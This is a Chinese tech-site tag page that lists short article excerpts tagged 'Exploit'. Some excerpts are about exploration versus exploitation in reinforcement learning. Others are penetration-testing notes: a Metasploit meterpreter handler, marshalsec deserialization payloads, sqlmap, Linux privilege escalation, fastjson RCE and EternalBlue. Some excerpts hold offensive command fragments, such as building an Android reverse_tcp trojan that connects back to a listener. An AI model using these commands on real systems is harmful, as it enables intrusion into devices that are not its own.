E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Exploit
Cobalt Strike使用教程二
0x01与Metasploit联动CobaltStrike→Metasploitmsf开启监听模式use
exploit
/multi/handlersetpayloadwindows/meterpreter
小白白@
·
2020-08-12 16:56
工具
强化学习导论 | 第二章 多臂赌博机
文章目录多臂赌博机问题简介动作价值Qt(a)Q_t(a)Qt(a)的计算方法1.以往动作奖励取平均2.增量方法计算Q值探索(exploration)和利用(
exploit
ation)的权衡1.ϵ\epsilonϵ-greedy
ttliu_kiwi
·
2020-08-12 12:16
学习总结
强化学习
强化学习(二):贪心策略(ε-greedy & UCB)
强化学习相关概念请点击:强化学习(一):概述 强化学习任务中有两个非常重要的概念——开发(
exploit
)
华师数据学院·王嘉宁
·
2020-08-12 12:53
强化学习
推荐系统实践笔记(二):利用与探索问题
推荐系统的经典问题之一,利用(
Exploit
ation)与探索(Exploration)问题
Exploit
ation:满足已知的用户需求Exploration:探索未知的用户需求
Exploit
ation
jony0917
·
2020-08-12 11:26
ϵ-greedy Policies
ϵ\epsilonϵ-greedyPolicies非常简单的平衡探索(Explotation)和利用(
Exploit
ation)的思想是通过确保整个过程随机来实现的。实际上就是随机和贪心相结合。
从流域到海域
·
2020-08-12 10:00
强化学习
sql注入学习笔记(4)--sqlmap注入心得
其实也不算心得吧,只是一点小小的体会,抛砖引玉怎么说呢,还是主要分享一下sql注入的思路,具体的操作还是要看网站了第一步,注入点sql注入点最好的寻找方式就是用google,可以经常去google的
exploit
-db
azraelxuemo
·
2020-08-12 10:58
sql注入学习笔记
java 反序列化利用工具 marshalsec 使用简介
[-a][-v][-t][[]]参数说明:-a:生成
exploit
下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder,SpringAbstractBeanFactory
whatday
·
2020-08-12 00:34
格式化字符串漏洞利用 二、格式化函数
二、格式化函数原文:
Exploit
ingFormatStringVulnerabilities作者:
[email protected]
译者:飞龙日期:2001.9.1版本:v1.2格式化函数是一类特殊的
布客飞龙
·
2020-08-11 19:23
溢出
Exploit
Development – 使用SEH绕过Security Cookie
前面我们介绍在关闭/GS和DEP的情况下,如何利用栈溢出来实现
exploit
。下面我们会开启/GS,以及介绍突破/GS的常用手法。
dupei
·
2020-08-11 16:16
Security
能够让浏览器崩溃的12行代码
#dos #0day #
exploit
//使用以下这段JavaScript代码能让firefox,chrome。safari
weixin_34310127
·
2020-08-11 14:16
java
javascript
可以让浏览器崩溃的12行代码
#dos #0day #
exploit
//使用下面这段JavaScript代码能让firefox,chrome,safari
wackycrazy
·
2020-08-11 13:19
趣闻
使用Metasploit入侵windows之自动扫描
metasploit很好很强大,集成了700多种
exploit
,但是如果操作系统打满了补丁,也还是很难入侵的,所以为了测试,选择了windowsxp最古老的版本,就是不带任何的SPx补丁,或者可以选择windowsxpSP1
weixin_30528371
·
2020-08-11 06:23
Exploit
-Exercise之Protostar-stack
关于环境准备,在官网https://
exploit
-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。
Neil-Yale
·
2020-08-10 12:30
bin
区块链论文6(teether检测智能合约漏洞并自动生成漏洞路径)
teEther:GnawingatEthereumtoAutomatically
Exploit
SmartContracts论文地址1、提供了一个基于低级EVM指令的易受攻击合约的通用定义。
Psychowo
·
2020-08-10 09:23
区块链
使用Kali生成木马入侵安卓手机
reverse_tcplhost=192.168.21.128lport=55555R>/home/1.apk3.启动msfconsole,配置相关参数msfconsole//启动msfconsoleuse
exploit
软件测试日常记录
·
2020-08-09 23:18
kali
Web安全攻防:18---网络安全总结与自动化安全运维
渗透测试的方法信息收集渗透漏洞挖掘linux端口转发内网主机发现SSH端口转发ew穿透内网反弹和直连shellsocket5代理提权内核提权逻辑漏洞提权suid提权软件三、框架安全wordpressdrupal跟踪相关的框架漏洞
exploit
db
江南、董少
·
2020-08-09 17:25
Web安全攻防
漏洞练习之网络编程与堆栈溢出技术
0x00公众号之前发过
Exploit
-Exercise之Nebula实践指南,
Exploit
-Exercise一共有5个镜像可供练习,如下所示本系列文章将会介绍第二个镜像Protostar的通关经验。
合天智汇
·
2020-08-09 11:52
PEDA用法总结
PEDA用法总结一个强大的GDB插件PEDA是为GDB设计的一个强大的插件,全称是Python
Exploit
DevelopmentAssistanceforGDB。
TaQini852
·
2020-08-09 06:13
pwn
基础知识
searchsploit工具(
exploit
-db.com)使用实例 (linux 内核漏洞提权)
exploit
db
获取root权限是Linux漏洞利用的终极目标。跟Windows中的System用户一样,root用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的root用户,完全控制整个系统。一般来说,获取到低权限shell后我们通常会做下面几件事:1.检测操作系统的发行版本2.查看内核版本3.检测当前用户权限4.列举Suid文件5
whatday
·
2020-08-09 02:03
PicoCTF-2019-WirteUp
1.2Warm-GeneralSkills直接将十进制转化为二进制picoCTF{101010}2.Insp3ct0r-Web
Exploit
ationhttps://2019shell1.picoctf.com
Zichel77
·
2020-08-09 02:56
WUSTCTF
Fastjson1.2.47版本远程命令执行漏洞
环境攻击机ip192.168.10.144漏洞环境ip192.168.10.158(直接用docker+vulhub的环境搭建)攻击的步骤:1.
Exploit
.exp需要进行javac编译2所有用的工具和
努力的学渣'#
·
2020-08-09 01:48
复现漏洞
CVE-2015-1328 Ubuntu 12.04, 14.04, 14.10, 15.04 overlayfs Local Root
catalog0.引言1.Description2.EffectedScope3.
Exploit
Analysis4.PrincipleOfVulnerability5.PatchFix0.引言新技术、高性能技术的不断发展
weixin_34112181
·
2020-08-09 00:19
linux提权辅助工具(一):linux-
exploit
-suggester.sh
来自:https://raw.githubusercontent.com/mzet-/linux-
exploit
-suggester/master/linux-
exploit
-suggester.sh#
weixin_30799995
·
2020-08-08 23:17
渗透
介绍:在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过
exploit
,bug,错误配置来提升权限。
weixin_30699741
·
2020-08-08 23:00
怎么用c#编写浏览器或者执行javascript代码?
OWASP-Xenotix-XSS-
Exploit
-Framework-mast
BabyKylin
·
2020-08-08 22:03
浏览器
javascript
c#
编译
解释
执行
kali攻防第8章 Metasploit新手知识扫盲
2、模块漏洞Cmd的模块都是操作系统类型,x86的模块都是系统应用平台模块,其他基于各个平台的漏洞模块(如:osx、solaris、windows等)3、进入模块命令use
exploit
,如下进入smb
随行之旅
·
2020-08-08 21:09
安全攻防之旅
Android 实现根据录音分贝画波浪线
compile'com.github.Jay-Goo:AndroidMP3Recorder:v1.0.7'自己看就行了我就直接复制自己更改的地方上代码2:packagecom.example.launcher
exploit
.Shr
牛角宝宝
·
2020-08-08 19:27
PFNL(ICCV2019 视频超分辨率 用Non-Local代替运动补偿)
ProgressiveFusionVideoSuper-ResolutionNetworkvia
Exploit
ingNon-LocalSpatio-TemporalCorrelations文章地址:http
叱咤风云666
·
2020-08-08 18:34
VSR
ICCV2019
我的CTF学习与教学之旅笔记15
有思路了,msf启动
exploit
/multi/handler监听,利用上传漏洞,上传反射shell文件,点击运行。接下来分析扫描结果:发现有ftp、ssh、http先访问一下login.
花纵酒
·
2020-08-08 17:15
web安全
0day安全:软件漏洞分析技术(第2版)
第一篇为漏洞
exploit
的基础理论和初级技术,可以引领读者迅速入门;第二篇在第一篇的基础上,结合国内外相关研究者的前沿成果,对漏洞技术从攻、防两个方
iteye_4515
·
2020-08-08 16:16
实战Linux下三种不同方式的提权技巧
介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过
exploit
,bug,错误配置来提升权限。
fly小灰灰
·
2020-08-08 12:48
linux
永恒之蓝漏洞简单分析
ShadowBrokersGroup测试环境漏洞分析漏洞1(CVE-2017-0144)漏洞2-SMBtransactionsFEA_LIST格式转换小结漏洞3-构造内存布局srvnet对象spraysrv对象spray
Exploit
WALINX
·
2020-08-08 00:56
漏洞利用
XSS ShellCode的调用
1.动态调用远程JavaScript假设www.bug.com是某个页面含有一个XSS漏洞,
Exploit
如下:http://www.bug.com/view.php?
N1nG
·
2020-08-08 00:36
Web前端经验之谈
ani
exploit
#ani
exploit
modifiedbyhacker2005/netwind#include/*ANIHeader*/unsignedcharuszAniHeader[]="/x52/x49/x46/
netwindmiss
·
2020-08-08 00:57
缓冲溢出技术
iostream
windows
header
file
struct
xp
warftp1.65
exploit
for winxp sp2
/**********warftp1.65
exploit
madebyhacker2005/netwind****************/#include#include#pragmacomment(lib
netwindmiss
·
2020-08-08 00:56
缓冲溢出技术
command
socket
struct
stream
service
system
LINUX 普通用户提权ROOT (完整版)SHELL版首发!!!
1.在LINUX目录下建立test帐户2.下载a脚本在http://milw0rm.com/
exploit
s/84783.查看UDEV的PID方法一:先cat/proc/net/netlinkffff81007758740015364ffffffff0000000000000000002ffff810037f81000160000000000000000000000000002ffff810077
sdusoul
·
2020-08-07 17:09
linux
docker desktop无法启动问题
折腾了很久也没搞定,而且还把电脑弄蓝屏了,但最终还是搞定了,方法如下:OpenWindowsSecurityOpenApp&BrowsercontrolClick
Exploit
protectionsettingsSwitcht
haiziccc
·
2020-08-07 14:07
云开发
电脑主板资料库 07【转至www.ongood.com.tw】【Fre
eXploiT
收集整理】
MB(主機版)資料第七頁AMIBIOS昇級步驟(取自BIOS維修網站)忠告:昇級、更新BIOS有一定的風險,除非你的電腦出現故障;否則如果運行正常,請慎重考慮!!AWARD的刷新程序的使用方法我們已經很熟悉了,對於AMI刷新程序的使用方法,則是初學者們常問的一個問題,下面我們以AMI最高版本的刷新程序8.21版為例,說明一下其使用方法。同樣,刷新程序仍需要純DOS方式下運行,把下載的刷新程序解壓,
freexploit
·
2020-08-07 13:27
故障解析
大众点评反爬虫机制,用户评论自编码替换
本人是研究推荐系统的,最近在看到一篇文章
Exploit
ingRankingConsistencyPrincipleinRepresentationLearningforLocationPromotion
dinghui3365
·
2020-08-07 13:19
电脑主板资料库 08【转至www.ongood.com.tw】【Fre
eXploiT
收集整理】
MB(主機版)資料第八頁輕松修改BIOS開機畫面(取自BIOS維修網站)漂亮的開機畫面是品牌機的專利,普通的使用者都十分向往,可是,繁瑣的制作操作過程(DOS操作棋式)讓普通使用者望而止步,因此只有少數的玩家才擁有漂亮的開機畫畫,而普通使用者整天面對的依然是枯燥的自檢畫面,難道普通的使用者就無法享用漂亮的開機畫面嗎?EPoXMagicScreen的出現改變了磐英主板使用者的苦腦,MagicScre
freexploit
·
2020-08-07 09:59
故障解析
fastjson =< 1.2.47 反序列化漏洞复现
win10fastjson1.2.47jdk1.8.1marshalsec环境过程首先先创建maven项目,下载fastjson版本为1.2.47com.alibabafastjson1.2.47创建一个
Exploit
.java
weixin_30430169
·
2020-08-05 20:46
Writeup of NCTF
我们编辑一下:再点击一下开门,得到flagnctf{follow_me_to_
exploit
}这
PD.风沐白
·
2020-08-05 19:28
ctf
【白帽子讲web安全】第一章 我的安全世界观(读书笔记)
eg:TESO写过一个攻击SSH的
exploit
入侵美国中情局随着防火墙
该学习了啊
·
2020-08-05 18:33
web安全
白帽子讲Web安全(对看书之后的一点笔记)
黑客使用的漏洞代码是“
exploit
”.2.黑客的发展起初黑客攻击系统软件的居多,能够获取到“root”权限,(著名的黑客组织TESO)早
Serendipity_筱楠
·
2020-08-05 18:01
网络安全
渗透中POC、EXP、Payload与Shellcode的区别
EXP:全称’
Exploit
',中文’利用',指利用系统漏洞进行攻击的动作。Payload:中文’有效载荷',指成功
exploit
之后,真正在目标系统执行的代码或指令。
李-疯子
·
2020-08-05 16:23
Linux
渗透
Kali
SSh爆破类 Fuckssh
exploit
工具-ssh连接类
SSh爆破类Fuckssh
exploit
工具fuckSsh=Fuckssh
exploit
('10.1.6.168',port=22)fuckSsh.setUserPwd('root','xxoo')fuckSsh.run
pyphrb
·
2020-08-05 13:54
编程之美
渗透测试
Fault-Tolerance, Fast and Slow:
Exploit
ing Failure Asynchrony in Distributed Systems
本文(OSDI18')主要介绍一种新的副本复制协议:SAUCR(场景可感知的更新与故障恢复)。它是一种混合的协议:在一定场景(正常情况)下:副本复制的数据缓存在内存中。故障发生时(多个节点挂掉,处于系统无法正常运行的边缘):副本复制的数据缓存同步刷入磁盘。该协议在保证高性能的同时,保证了很强的持久性和可用性。Introduction分布式存储系统通常通过维护多个副本来进行容错,这些协议都是基于Ma
晓乎
·
2020-08-05 13:00
CMD下修改注册表 完全攻略(Fre
eXploiT
搜集 整理 热荐)
ALLyeSNO注:先来段精彩的【本文未包含zzzevazzz写的doallincmd里面使用inf修改注册表的方法】regedit虽是gui下使用的东东但其实是有未公开的参数的可以在cmd下使用regedit的运行参数REGEDIT[/L:system][/R:user]filename1REGEDIT[/L:system][/R:user]/Cfilename2REGEDIT[/L:syste
freexploit
·
2020-08-05 10:51
Bat
Man
注册表研究
编程指南
Fun&TipS
CTF资料篇
CTF领域指南|IDF实验室博译有道百度信息安全吧有时可以探到一些小道内幕I春秋安全课程比较多,但能动手实操的少,课程收费有点小贵XCTFtime国内CTF联赛查询网站ModernBinary
Exploit
ationbin
山山得久
·
2020-08-05 10:13
CTF学习之路
CVE-2019-0708复现
小白复现CVE-2019-07081.CVE-2019-0708范围需要设置rhoststargetrport(默认3389)我自己遇到的问题(1.更新MSF52.下载
exploit
3.存放路径)具体实现过程复现在虚拟机环境下实现请勿用于违法乱纪行为
sixgod灬
·
2020-08-04 21:50
上一页
14
15
16
17
18
19
20
21
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他